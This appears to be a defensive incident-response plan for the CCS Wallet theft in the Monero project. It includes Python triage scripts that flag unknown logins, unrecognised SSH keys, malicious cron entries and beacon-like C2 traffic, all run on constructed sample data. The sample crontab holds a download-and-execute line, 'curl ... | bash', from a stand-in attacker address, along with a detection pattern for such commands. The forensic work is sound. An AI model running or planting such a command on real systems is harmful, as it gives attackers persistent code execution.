CCS Wallet Incident Response. Forensics and Attribution
Per incident: CCS Wallet Incident
After the disclosure of the stolen funds there have been a lot of questions about what exactly happened and how an attacker could have gotten access to the funds. I am creating this issue so we can gather the evidence/logs needed to properly investigate the incident and hopefully get some attribution for the attack.
Incident Response Plan
Preparation
- Timeline creation (including actions that could potentially be related to the incident, with timestamps and their time zone)
- Inventory of known devices affected
- Create forensic images of affected devices (disk, plus memory where possible) before any cleanup, so that evidence is preserved and the original drives are not modified.
- Inventory of events from users
Forensics
Static Analysis
- Identify IOCs (Indicators of Compromise) in the following:
  - Access logs (logins from unfamiliar sources, unusual hours, privilege escalation immediately after login)
  - Backdoored accounts / auth keys (new users, added SSH authorized_keys entries, changed sudoers)
  - Binaries/scripts (recently modified or unsigned executables, scripts in temp directories)
- Identify persistence (cron jobs, systemd units, scheduled tasks, shell profile and startup entries)
- Memory dump analysis (TBA)
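As an added example (not code from the incident or from the Monero project) of the static triage above, the script below scans a constructed auth.log excerpt, a constructed authorized_keys file and a constructed crontab for the indicators listed, and merges the log entries with analyst-supplied user reports into a single sorted timeline. The allow-lists of known source IPs and known key comments, the hostnames, IPs and the log year are all assumptions for the sample; on a real host the same functions would be fed the contents of /var/log/auth.log, ~/.ssh/authorized_keys and the user and system crontabs taken from the forensic image.

```python
"""Static triage helpers: IOC hunting in access logs, auth keys and cron.

Added example, not part of the original issue or the Monero code base.
Every input below is constructed sample data, not real incident evidence.
"""
import re
from datetime import datetime

# Allow-lists the device owner would supply during the interview (assumed).
KNOWN_SOURCE_IPS = {"10.0.0.5"}
KNOWN_KEY_COMMENTS = {"dev@laptop"}
YEAR = 2023  # syslog lines carry no year, so the sample assumes one

# Constructed sample evidence.
AUTH_LOG = """\
Sep  1 08:14:02 wallet-host sshd[2210]: Accepted publickey for dev from 10.0.0.5 port 50122 ssh2: ED25519 SHA256:aaaa
Sep  1 23:41:17 wallet-host sshd[4412]: Accepted publickey for dev from 203.0.113.77 port 41002 ssh2: ED25519 SHA256:bbbb
Sep  1 23:42:05 wallet-host sudo:      dev : TTY=pts/1 ; PWD=/home/dev ; USER=root ; COMMAND=/bin/bash
Sep  2 00:03:40 wallet-host sshd[4420]: Failed password for root from 198.51.100.9 port 5111 ssh2
"""
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEx dev@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFz
"""
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/10 * * * * curl -s http://203.0.113.77/u.sh | bash
"""
# Constructed user report that the timeline should interleave with the logs.
USER_REPORTS = [(datetime(2023, 9, 1, 18, 30), "user report",
                 "dev installed a 'trading tool' downloaded from a forum link")]

LOG_RE = re.compile(r"^(\w{3})\s+(\d+) (\d\d:\d\d:\d\d) \S+ (\S+?)(?:\[\d+\])?: (.*)$")
ACCEPT_RE = re.compile(r"Accepted (\w+) for (\S+) from (\S+) port")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def parse_auth_log(text):
    """Turn syslog-style auth.log lines into (timestamp, service, message)."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        mon, day, clock, service, msg = m.groups()
        ts = datetime.strptime(f"{YEAR} {mon} {int(day)} {clock}", "%Y %b %d %H:%M:%S")
        events.append((ts, service, msg.strip()))
    return events


def find_login_iocs(events):
    """Flag successful logins whose source IP is not on the owner's allow-list."""
    findings = []
    for ts, _service, msg in events:
        m = ACCEPT_RE.search(msg)
        if m and m.group(3) not in KNOWN_SOURCE_IPS:
            findings.append((ts, f"login for {m.group(2)} via {m.group(1)} "
                                 f"from unknown source {m.group(3)}"))
    return findings


def find_key_iocs(text):
    """Flag authorized_keys entries whose comment the owner does not recognise.

    Handles an optional leading options field (e.g. from="...") by locating
    the key-type token rather than assuming it is first on the line.
    """
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or len(parts) < idx + 2:
            continue  # blank, comment or malformed line
        comment = " ".join(parts[idx + 2:]) or "<no comment>"
        if comment not in KNOWN_KEY_COMMENTS:
            findings.append(f"authorized_keys:{n}: unrecognised key "
                            f"({comment}) {parts[idx + 1][:16]}...")
    return findings


def find_cron_iocs(text):
    """Flag cron entries that download-and-execute or run from temp dirs."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if PIPE_TO_SHELL.search(line) or "/tmp/" in line or "/dev/shm/" in line:
            findings.append(f"crontab:{n}: suspicious persistence: {line.strip()}")
    return findings


def build_timeline(events, extra=()):
    """Merge parsed log events with analyst-supplied rows, sorted by time."""
    rows = [(ts, "auth.log", msg) for ts, _service, msg in events]
    rows.extend(extra)
    return sorted(rows, key=lambda r: r[0])


if __name__ == "__main__":
    evts = parse_auth_log(AUTH_LOG)
    for ts, text in find_login_iocs(evts):
        print(ts, text)
    for f in find_key_iocs(AUTHORIZED_KEYS) + find_cron_iocs(CRONTAB):
        print(f)
    for ts, src, msg in build_timeline(evts, USER_REPORTS):
        print(f"{ts:%Y-%m-%d %H:%M:%S}  {src:12}  {msg}")
```

The value of the merged timeline is the ordering it exposes: in the sample, the user-reported install precedes the first login from an unknown address, which is followed within a minute by a sudo to root and later by a cron entry fetching a script from the same address. That sequence is the skeleton of the kill chain the post-mortem below asks for; the allow-lists only narrow the search, so a login from a known IP still deserves scrutiny if its timing is odd.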
Dynamic Analysis (TBA)
- Identify network traffic from the host to potential C2 infrastructure (periodic connections to unfamiliar destinations, traffic outside the hours the owner was using the machine)
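An added example (not from the issue or the Monero project) of the dynamic-analysis step: given a connection log from the suspect host, the function below groups outbound connections by destination and flags those that recur at a near-constant interval, which is how a C2 implant's beacon typically looks, while ignoring destinations the owner has vouched for. The CSV below is constructed sample data, the column layout is an assumption (a Zeek conn.log or firewall export would be mapped to the same three fields), and the allow-listed node address is hypothetical.

```python
"""Beacon candidate detection over a constructed connection log.

Added example, not part of the original issue or the Monero code base.
"""
import statistics
from collections import defaultdict

# Constructed sample: unix timestamp, source, destination, destination port.
CONN_LOG = """\
ts,src,dst,dport
1693526400,10.0.0.12,203.0.113.77,443
1693526460,10.0.0.12,203.0.113.77,443
1693526521,10.0.0.12,203.0.113.77,443
1693526579,10.0.0.12,203.0.113.77,443
1693526641,10.0.0.12,203.0.113.77,443
1693526400,10.0.0.12,192.0.2.10,18081
1693526437,10.0.0.12,192.0.2.10,18081
1693526902,10.0.0.12,192.0.2.10,18081
1693527310,10.0.0.12,192.0.2.10,18081
1693526500,10.0.0.12,198.51.100.40,443
"""
# Destinations the owner recognises, e.g. their own monerod node (assumed).
KNOWN_DESTINATIONS = {"192.0.2.10"}


def parse_conn_log(text):
    """Parse the CSV into (timestamp, destination, port) tuples."""
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    rows = []
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        rows.append((int(rec["ts"]), rec["dst"], int(rec["dport"])))
    return rows


def beacon_candidates(rows, known=KNOWN_DESTINATIONS, min_conns=4, max_cv=0.2):
    """Return destinations contacted repeatedly at a near-constant interval.

    A destination qualifies when it is not allow-listed, has at least
    `min_conns` connections, and the coefficient of variation of the gaps
    between connections is at most `max_cv` (low jitter = beacon-like).
    """
    by_dst = defaultdict(list)
    for ts, dst, port in rows:
        by_dst[(dst, port)].append(ts)
    found = []
    for (dst, port), stamps in by_dst.items():
        if dst in known or len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            found.append({"dst": dst, "port": port, "count": len(stamps),
                          "period_s": round(mean, 1), "cv": round(cv, 3)})
    return found


if __name__ == "__main__":
    for c in beacon_candidates(parse_conn_log(CONN_LOG)):
        print(f"{c['dst']}:{c['port']} {c['count']} conns, "
              f"period {c['period_s']}s, cv {c['cv']}")
```

Each flagged destination is a lead, not a verdict: an update checker also beacons regularly, so the next step is to tie the destination back to the process that opened the connection (from the memory image or live `ss -tnp` output) and to compare it against the addresses found in the static triage, such as the one a malicious cron entry fetches from.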
Identify known groups
There are some known groups who target people in the crypto space. Those actors reuse a lot of TTPs, so comparing what we find against the published TTPs and IOCs of known actors gives us a starting place for easy matches. This is just basic homework, so don't expect it to be our main path forward.
Containment and clean up
If an attacker has persistent access on a machine then we need to contain and eradicate that access. Cleanup can range from removing scheduled tasks to a full OS reinstall (which is usually recommended, in case anything was missed).
Other cleanup includes rotating keys and passwords and hardening the accounts overall, since malware can steal cookies, session tokens and saved passwords from browsers. This means adding MFA and hardware keys where applicable.
Post Mortem and lessons learned
Any findings are used to complete the description of the attack kill chain and provide any context missing from the timeline. Any identified threats can then be used to give recommendations for improving the security posture of devs in the future. This is not a time to place blame but a time to learn and improve.
Threat modeling
Monero devs are operating in a hostile environment full of bad actors looking to steal funds or potentially target the code base. I can help create processes to mitigate those threats, and those processes can be translated into easy-to-use workbooks for developers.